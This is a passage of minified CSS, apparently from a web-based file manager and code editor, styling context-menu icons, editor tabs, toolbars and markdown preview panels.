!important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.frame-main{top:40px;overflow:auto;bottom:40px;width:100%;position:absolute;}.bindary-box{width:300px;margin:0 auto;padding-bottom:40px;border:1px solid #ddd;border:1px solid rgba(0,0,0,0.2);background:#fff;box-shadow:0 1px 5px rgba(0,0,0,0.4);margin-top:5%;border-radius:4px;}.bindary-box .title{width:100%;height:150px;padding-top:20px;border-radius:5px 4px 0 0;background:#6699cc url("../../../images/common/login.png") -110px 0px;}.bindary-box .ico{width:140px;height:140px;border-radius:100px;overflow:hidden;margin:0 auto;background:rgba(255,255,255,0.4);text-align:center;}.bindary-box .ico img{width:80%;padding-top:15px;}.content-info{text-align:center;}.content-info .name{padding:30px;padding-bottom:2px;font-size:22px;word-wrap:break-word;word-break:break-all;}.content-info .size{color:#888;}.content-info .size i{font-style:normal;color:#aaa;padding-left:10px;}.content-info .btn-group{margin-top:25px;}.content-info .btn-download{width:115px;}.content-info .dropdown-toggle{height:20px;}.content-info .error-tips{padding-top:15px;color:#bbb;}.title-box{height:36px;width:800px;border-bottom:1px solid #ddd;margin:0 auto;margin-top:10px;}.title-box .name{font-size:20px;float:left;}.title-box .size{float:left;line-height:30px;padding-left:10px;}.title-box .size .share-time{padding-left:10px;font-style:normal;color:#aaa;}.title-box .btn-group{float:right;}.title-box .btn-group .btn-download{padding:4px 20px;}.title-box .btn-group .dropdown-toggle{height:16px;height:30px \9;}.content-box,.content-box.markdown-preview{width:900px;margin:30px auto;margin-bottom:30px;}.show-image{text-align:center;}.show-image img{max-width:100%;}.show-pdf{width:100%;margin:0px;background:#ccc;position:absolute;top:0px;bottom:0px;}.show-code{border:1px solid #ddd;box-shadow:0 2px 5px rgba(0,0,0,0.2);width:80%;position:absolute;bottom:0px;left:10%;top:0px;}.show-code .code{padding:0px;margin:0;height:100%;}.show-code .ace_editor{font-size:1em;font-family:Consolas, source-code-pro, Monaco, Menlo, 'Ubuntu Mono', Consolas, monospace, '';}.show-iframe{margin:0;width:100%;height:100%;position:absolute;top:0;bottom:0;left:0;right:0;}.show-flash{width:80%;margin:0 auto;padding-top:30px;height:90%;}html,body{overflow:hidden;overflow-x:hidden;overflow-y:hidden;}.edit-main{color:#444;font-size:1em;width:100%;}.edit-main .edit-tab .tabs .edit-changed a.close{opacity:1.0;filter:alpha(opacity=100);color:#63acff;}.edit-main .edit-tab .tabs .edit-changed .icon-remove:before{content:"\f06a";}.edit-main .edit-tab .tabs .edit-changed a:hover.icon-remove:before{content:"\f057";}.context-menu-list{z-index:1000 !important;box-shadow:0 0px 10px rgba(0,0,0,0.15);border:1px solid #dfdfdf;border-radius:2px;max-height:500px;-webkit-animation-name:inherit;-webkit-animation-duration:inherit;-webkit-animation-timing-function:inherit;-webkit-animation-iteration-count:inherit;}.context-menu-list.code-font-list,.context-menu-list.code-theme-list{overflow-y:auto;overflow-x:hidden;}.context-menu-list.code-font-list .context-menu-item,.context-menu-list.code-theme-list .context-menu-item{padding:0px 10px 0 10px;}.context-menu-list.code-theme-list{width:180px !important;}.context-menu-list.code-charset-list{height:250px;overflow:auto;}.context-menu-list.code-charset-list .context-menu-item{padding:0 10px 0 0px;}.context-menu-list .gotoline-input input{padding:4px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;margin-left:15px;height:16px;}.context-menu-list .gotoline-input input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.context-menu-list .code-charset-list .context-menu-item.selected .font-icon{margin-right:5px;margin-left:10px;}.code-mode-list{position:absolute;z-index:99;top:auto;right:300px;bottom:30px;overflow:auto;display:block;width:180px;height:250px;padding:35px 0 10px 0;}.code-mode-list li{padding:2px 2em;font-size:13px;cursor:pointer;line-height:20px;}.code-mode-list li.list-input{position:fixed;background:#eee;-webkit-transform:translateZ(0);height:30px;width:160px;bottom:292px;padding:4px 0 0 20px;}.code-mode-list li.list-input input{width:110px;padding:4px 10px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.code-mode-list li.list-input input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.code-mode-list li.hover{background:#eee;background:#63acff;color:#fff;}.code-mode-list li.selected,.code-mode-list li.selected.hover{background:#63acff;color:#fff;}.edit-tab .tabs{height:29px;width:100%;background:#fff;overflow:hidden;border-bottom:1px solid #ddd;}.edit-tab .tabs .tab{position:relative;height:30px;line-height:30px;color:#666;width:120px;float:left;background:#f6f6f6;border-right:1px solid #ddd;}.edit-tab .tabs .tab .name{margin-left:5px;display:block;width:80%;text-align:center;overflow:hidden;white-space:nowrap;position:absolute;z-index:2;cursor:default;height:28px;}.edit-tab .tabs .tab .name img{height:17px;padding-bottom:4px;padding-right:3px;}.edit-tab .tabs .tab .close{float:right;color:#aaa;position:relative;opacity:0.1;filter:alpha(opacity=10);font-size:1.25em;margin-right:3px;z-index:3;margin-top:6px;-webkit-transition:opacity 0.1s;-moz-transition:opacity 0.1s;-o-transition:opacity 0.1s;-ms-transition:opacity 0.1s;transition:opacity 0.1s;width:18px;height:18px;text-align:center;line-height:18px;}.edit-tab .tabs .tab .close:hover{opacity:0.9;filter:alpha(opacity=90);}.edit-tab .tabs .tab .close:active{opacity:1.0;filter:alpha(opacity=100);}.edit-tab .tabs .tab.hover{background:#eee;background:linear-gradient(to right,#fff,#ccc);}.edit-tab .tabs .tab.hover .close{opacity:0.6;filter:alpha(opacity=60);}.edit-tab .tabs .tab.this{z-index:20;color:#23B2EC;color:#fff;background:#63acff;background:linear-gradient(to right,#44abf6,#2865e2);}.edit-tab .tabs .tab.this .close{opacity:0.1;filter:alpha(opacity=10);color:#eee;}.edit-tab .tabs .tab.this .close:hover{opacity:0.9;filter:alpha(opacity=90);}.edit-tab .tabs .tab.this .close:active{opacity:1.0;filter:alpha(opacity=100);color:#fff;}.edit-tab .tabs .tab.this.hover .close{opacity:0.6;filter:alpha(opacity=60);}.edit-tab .tabs .tab.loading .close{opacity:1.0;filter:alpha(opacity=100);color:#666;border-radius:20px;-webkit-animation:moveCircleLoop 1.4s infinite linear;animation:moveCircleLoop 1.4s infinite linear;}.edit-tab .tabs .tab.loading .close:before{content:"\f110";}.edit-tab .tabs .tab.loading.this .close{color:#ffffff;}.edit-tab .tabs .tab.loading.hover .close{opacity:1.0;filter:alpha(opacity=100);}.edit-tab .tabs .add{float:left;color:#666;line-height:25px;height:30px;border:1px solid #ddd;border-bottom:none;border-radius:3px 3px 0 0;font-size:8px;margin-top:2px;padding:0px 10px;background:#eee;margin-left:3px;}.edit-tab .tabs .add:hover{background:#ddd;}.edit-tab .tabs .add:active{background:#888;color:#ccc;}.draggable-dragging{position:absolute;z-index:99999;color:#fff;height:30px;line-height:30px;opacity:0.6;filter:alpha(opacity=60);width:120px;float:left;cursor:-webkit-grab;background:#63acff;background:linear-gradient(to right,#44abf6,#2865e2);}.draggable-dragging .name{margin-left:5px;display:block;width:80%;text-align:center;overflow:hidden;white-space:nowrap;position:absolute;z-index:2;cursor:default;height:28px;}.draggable-dragging .name img{height:17px;padding-bottom:4px;padding-right:3px;}.draggable-dragging .close{display:none;}.edit-body{width:100%;background:#fff;position:absolute;bottom:0;top:59px;z-index:50;}.edit-body .tabs{width:100%;height:100%;position:absolute;top:0px;bottom:0;}.edit-body .tabs .edit-content{display:none;padding:0;margin:0;height:100%;width:100%;}.edit-body .tabs .edit-content.this{display:block;padding:0;}.edit-body .tabs .tab{padding:10px;display:none;}.edit-body .bottom-toolbar{width:auto;height:25px;z-index:25;position:absolute;bottom:5px;right:0;margin-right:20px;border-radius:4px;opacity:0.8;filter:alpha(opacity=80);background:#fff;border:1px solid #f3f3f3;}.edit-body .bottom-toolbar a{float:left;padding:0 10px;line-height:25px;text-decoration:none;color:#000;}.edit-body .bottom-toolbar a:hover{color:#63acff;}.edit-body .bottom-toolbar a.select{background:#63acff;color:#fff;border-radius:1px;}.edit-body .bottom-toolbar a .font-icon{color:#333;}.introduction{font-size:1em;position:fixed;width:100%;top:64px;left:0;bottom:0;overflow:auto;background:#FFF;}.introduction .intro-left{width:40%;float:left;}.introduction .tips{padding:5px;margin-bottom:0;color:#888;}.introduction .tips p{padding-left:2em;word-break:break-all;line-height:1.2em;}.introduction .tips p:before{content:"\f006";font-family:FontAwesome;padding-right:8px;}.introduction .tips h1{font-size:25px;font-weight:400;border-bottom:1px dashed #ddd;padding:4px 0 10px 5px;margin:5px 0 10px 10px;}.introduction .tips h1 span{border-bottom:3px solid #ddd;padding:8px;color:#666;}.introduction pre{margin-left:15px;padding:5px;color:#56A238;line-height:1.5em;background:#fff;border-bottom:1px solid #eee;}.introduction .intro-right{width:60%;float:left;}.introduction .blue{color:#8BB7D5;}.introduction .blue h1 span{border-color:#8BB7D5;color:#8BB7D5;}.introduction .orange{color:#F27642;}.introduction .orange h1 span{color:#F27642;border-color:#F27642;}.introduction .green{color:#56A238;border-left:1px solid #ddd;}.introduction .green h1 span{color:#56A238;border-color:#56A238;}div.tools{height:28px;z-index:999;border-bottom:1px solid #ddd;overflow:hidden;background:#f8f8f8 url("../../../images/common/bg.gif") 0 0px;min-width:560px;-webkit-box-shadow:1px 2px 15px #eee;-moz-box-shadow:1px 2px 15px #eee;box-shadow:1px 2px 15px #eee;}div.tools .disable-mask{width:100%;height:33px;margin-left:-10px;background:#fff;position:absolute;opacity:0.4;filter:alpha(opacity=40);z-index:10;margin-top:-4px;}div.tools .left{float:left;margin:0 0 0 5px;}div.tools .right{float:right;margin:0 5px 0 0;}div.tools a{font-size:1.25em;font-weight:800;float:left;color:#555;font-weight:400;text-decoration:none;padding:0px 9px;line-height:29px;height:29px;}div.tools a .font-icon{font-size:14px;color:#888;}div.tools a .icon-caret-down{padding-left:5px;font-size:1em;color:ccc;}div.tools a:hover{background:#eee;}div.tools a.select,div.tools a.select:hover,div.tools a:active{background:#63acff;color:#fff;}div.tools a.select i.font-icon,div.tools a.select:hover i.font-icon,div.tools a:active i.font-icon{color:#fff;}div.tools .right .btn{padding:1px 7px;margin-right:-1px;height:20px;background:#eee;margin-top:2px;float:right;line-height:20px;}div.tools .line{border-left:1px solid #ccc;margin:5px 4px;float:left;height:16px;}ul.dropbox{color:#666;font-size:1em;position:absolute;top:27px;z-index:1000;margin:0px;}ul.dropbox li{list-style:none;padding:2px 0 2px 10px;line-height:20px;cursor:pointer;}ul.dropbox .lihover,ul.dropbox li.this{background:#63acff;color:#fff;}#fontsize{display:none;left:166px;width:100px;min-width:100px;}#codetheme{display:none;left:173px;}body div#ace_settingsmenu,body div#kbshortcutmenu{background-color:#000;opacity:0.75;filter:alpha(opacity=75);color:#FFF;box-shadow:-5px 4px 5px rgba(0,0,0,0.2);-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}.edit-content .resize{position:absolute;background:#000;cursor:col-resize;margin-left:-5px;background-color:#f6f6f6;background-color:rgba(0,0,0,0.01);background:url("../../../images/common/resize.png") 0px 50% no-repeat;height:100%;width:10px;left:100%;z-index:100;}.edit-content .resize:hover{background-color:#eee;background-color:rgba(0,0,0,0.1);}.edit-content .resize.resize-active{background-color:#ddd;background-color:rgba(0,0,0,0.2);}.edit-content.markdown-full .ace_editor{width:100% !important;}.edit-content.markdown-full .resize{display:none;}.edit-content.markdown-full .edit-right-frame{width:0 !important;}.edit-right-frame{position:fixed;top:59px;right:0px;width:40%;bottom:0;background:#fff;border-left:1px solid #ddd;z-index:99;overflow:visible;}.edit-right-frame .mask-view{z-index:9999;opacity:0.05;filter:alpha(opacity=5);}.edit-right-frame .right-main{width:100%;height:100%;overflow:auto;}.edit-right-frame .preview-frame{position:absolute;top:0px;right:0;bottom:0;width:100%;background:#fff;}.edit-right-frame .preview-markdown-tool,.edit-right-frame .function-list-tool,.edit-right-frame .preview-url-tool{width:100%;height:25px;border-bottom:1px solid #ddd;}.edit-right-frame .preview-markdown-tool .box,.edit-right-frame .function-list-tool .box,.edit-right-frame .preview-url-tool .box{width:105px;height:25px;position:absolute;top:0px;right:0px;background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.edit-right-frame .preview-markdown-tool .box a,.edit-right-frame .function-list-tool .box a,.edit-right-frame .preview-url-tool .box a{font-weight:800;text-decoration:none;border:1px solid rgba(200,200,200,0.01);display:inline-block;margin-top:1px;margin-left:2px;font-size:1.25em;position:relative;padding:0px 5px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.edit-right-frame .preview-markdown-tool .box a .font-icon,.edit-right-frame .function-list-tool .box a .font-icon,.edit-right-frame .preview-url-tool .box a .font-icon{color:#999;}.edit-right-frame .preview-markdown-tool .box a:hover,.edit-right-frame .function-list-tool .box a:hover,.edit-right-frame .preview-url-tool .box a:hover{border:1px solid #ccc;box-shadow:0 0 20px rgba(0,0,0,0.2) inset;}.edit-right-frame .preview-url-frame .preview-frame-content{position:absolute;right:0px;left:0px;bottom:0px;overflow:auto;top:25px;background:#fff;}.edit-right-frame .preview-url-frame .input-content{position:absolute;height:27px;right:100px;left:0px;}.edit-right-frame .preview-url-frame .input-content input{height:23px;border:none;border-right:1px solid #ddd;width:100%;padding-right:10px;text-shadow:1px 1px 3px #CCE;outline:none;color:#888;font-size:1.15em;box-shadow:#ddd 0px 0px 30px inset;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;}.edit-right-frame .preview-url-frame .input-content input:focus{box-shadow:#bbb 0px 0px 30px inset;}.edit-right-frame .preview-url-frame .box{border-left:1px solid #eee;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool{border:none;height:inherit;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box{position:absolute;bottom:0.1px;-webkit-transform:translateZ(0);z-index:999;top:20px;right:25px;background:rgba(200,200,200,0.2);opacity:0.6;filter:alpha(opacity=60);width:35px;height:140px;border:none;border-radius:0;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box .content{position:absolute;width:35px;top:0;left:0;height:100%;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box:hover{opacity:0.9;filter:alpha(opacity=90);}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a{margin:0;padding:0;display:block;text-align:center;height:35px;border:none;line-height:35px;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a .font-icon{color:#444;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a:hover{border:none;background:#bbb;color:#000;box-shadow:none;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a:hover .font-icon{color:#222;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar{position:fixed;bottom:0.1px;z-index:999;-webkit-transform:translateZ(0);height:29px;margin-top:5px;background:#f8f8f8 url("../../../images/common/bg.gif") 0 0px;left:420px;width:360px;top:-6px;border-left:1px solid #ddd;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .content{position:absolute;top:0;left:0;height:100%;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools{width:26px;height:100%;display:inline-block;text-decoration:none;text-align:center;margin:0;line-height:30px;float:left;padding:0;color:#666;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools:hover{background:#ccc;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools.md-tools-split{width:10px;color:#ccc;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools.md-tools-split:hover{background:none;}.edit-right-frame .preview-markdown-frame .markdown-preview{padding:10px 35px 100px 35px;}.edit-right-frame .preview-markdown-frame .markdown-help{width:650px;background:#fff;height:80%;box-shadow:0 5px 15px rgba(0,0,0,0.1);border-radius:4px;border-top-right-radius:0;position:absolute;top:20px;right:60px;border:1px solid #ccc;overflow:hidden;bottom:0.1px;z-index:9999;-webkit-transform:translateZ(0);}.edit-right-frame .preview-markdown-frame .markdown-help h3{padding:20px 10px 15px 20px;margin:0;border-bottom:1px solid #eee;font-size:20px;}.edit-right-frame .preview-markdown-frame .markdown-help .content{height:100%;overflow:auto;margin:10px;padding-bottom:20px;margin-right:0;}.edit-right-frame .preview-markdown-frame .markdown-help p{margin:0;}.edit-right-frame .preview-markdown-frame .markdown-help h5{font-weight:800;}.edit-right-frame .preview-markdown-frame .markdown-help pre{border-radius:4px;background:#eee;color:#777;font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;font-size:12px;}.edit-right-frame .preview-markdown-frame .markdown-help .col-md-4{width:35%;padding-bottom:70px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box{width:300px;background:#fff;height:80%;max-height:90%;box-shadow:0 5px 15px rgba(0,0,0,0.1);border-radius:4px;border-top-right-radius:0;position:absolute;top:20px;right:60px;border:1px solid #ccc;overflow:hidden;bottom:0.1px;z-index:9999;-webkit-transform:translateZ(0);}.edit-right-frame .preview-markdown-frame .markdown-menu-box h3{padding:20px 10px 15px 20px;margin:0;border-bottom:1px solid #eee;font-size:22px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .content{height:100%;overflow:auto;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu ul{padding:10px 10px 80px 10px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu li{font-size:1em;list-style:none;text-overflow:ellipsis;white-space:nowrap;line-height:1.0em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu li a{display:block;text-decoration:none;padding:5px 6px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu li a:hover{background:#def;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h2{margin-left:2em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h3{margin-left:3.5em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h4{margin-left:5em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h5{margin-left:6.5em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h6{margin-left:8em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .tools-markdown-more{position:absolute;top:20px;right:10px;}.edit-right-frame .preview-markdown-frame .markdown-setting{width:160px;height:auto;background:#fff;border:1px solid #ddd;z-index:10;box-shadow:0 5px 15px rgba(0,0,0,0.1);border-radius:4px;border-top-right-radius:0;position:absolute;top:125px;right:60px;-webkit-transform:translateZ(0);}.edit-right-frame .preview-markdown-frame .markdown-setting ul{padding:0;margin:10px 0;}.edit-right-frame .preview-markdown-frame .markdown-setting ul li{width:100%;height:25px;list-style:none;overflow:hidden;}.edit-right-frame .preview-markdown-frame .markdown-setting ul li.line{height:1px;background:#ddd;margin:5px 0;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a,.edit-right-frame .preview-markdown-frame .markdown-setting ul a:visited{display:block;line-height:25px;text-decoration:none;padding:0 0 0 20px;color:#444;overflow:hidden;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a i{padding-right:5px;color:#888;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a:hover{background:#63acff;color:#fff;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a:hover i{color:#fff;}.edit-right-frame .function-list .function-list-tool{height:100px;width:100%;}.edit-right-frame .function-search{position:absolute;top:30px;left:0;height:25px;right:5px;}.edit-right-frame .function-search input{padding:3px 2%;color:#222;margin:0 3%;width:90%;border-radius:3px;}.edit-right-frame .function-search .search-reset{position:absolute;top:5px;right:5%;font-size:1.25em;color:#aaa;display:block;cursor:pointer;}.edit-right-frame .function-search .search-reset:hover{color:#888;}.edit-right-frame .frame-right .function-list-parent{top:57px;}.edit-right-frame .function-list-box .cell b{color:#378eef;}.edit-right-frame .function-list-box .row-select .cell b{color:#ff9;}.edit-right-frame .function-list-tool{border:none;}.edit-right-frame .function-list-tool .box{width:100%;right:0px;overflow:hidden;background:#fff;}.edit-right-frame .function-list-tool .box span{display:block;padding:1px 10px;float:left;line-height:27px;}.edit-right-frame .function-list-tool .box a{display:block;float:right;margin-right:5px;}.edit-right-frame .function-list-parent{position:absolute;top:55px;right:0;bottom:15px;width:100%;background:#fff;}.edit-right-frame .function-list-box{padding:5px;-webkit-text-size-adjust:none;overflow:auto;margin-right:2px;height:100%;}.edit-right-frame .function-list-box .row-hover{background:#ddd;border-radius:3px;}.edit-right-frame .function-list-box .row-select{background:#63acff;color:#fff;border-radius:3px;}.edit-right-frame .function-list-box .cell-null{padding:10px 